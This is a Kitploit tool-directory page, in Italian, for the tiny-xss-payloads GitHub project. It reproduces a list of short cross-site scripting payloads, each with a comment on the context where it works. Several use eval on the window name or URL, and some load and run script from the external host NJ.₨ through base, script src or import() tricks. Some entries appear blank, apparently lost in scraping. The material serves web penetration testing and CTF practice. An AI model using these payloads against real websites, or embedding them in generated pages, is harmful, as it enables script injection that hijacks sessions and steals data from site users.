Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Tiny-XSS-Payloads — Una raccolta di piccoli payload XSS che possono essere utilizzati in diversi contesti. https://tinyxss.terjanq.me | Kitploit
Strumenti/GitHubGitHub/terjanq/tiny-xss-payloads
Generazione di PayloadSicurezza WebCTFRisorse Curate
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

Una raccolta di piccoli payload XSS che possono essere utilizzati in diversi contesti. https://tinyxss.terjanq.me

Vedi Repository
2.4k21841 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sito web
Condividi

Tiny-XSS-Payloads

Una collezione di brevi payload XSS utilizzabili in diversi contesti.

La demo disponibile qui: https://tinyxss.terjanq.me

Payload attuali

root@kitploit:~
<!-- Requires a relative script inserted to the DOM after the sink, 
  e.g. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
root@kitploit:~
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->

root@kitploit:~
<!-- Just a casual script -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- If you control the name of the window -->

root@kitploit:~
<!-- If you control the URL -->

root@kitploit:~
<!-- If number of iframes on the page is constant -->

root@kitploit:~
<!-- for Firefox only -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- If number of iframes on the page is random -->

root@kitploit:~
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
</script>">
root@kitploit:~
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
root@kitploit:~
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

Deprecati:

root@kitploit:~
<!-- If you control the URL, Safari-only -->

root@kitploit:~
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
Scarica lo strumento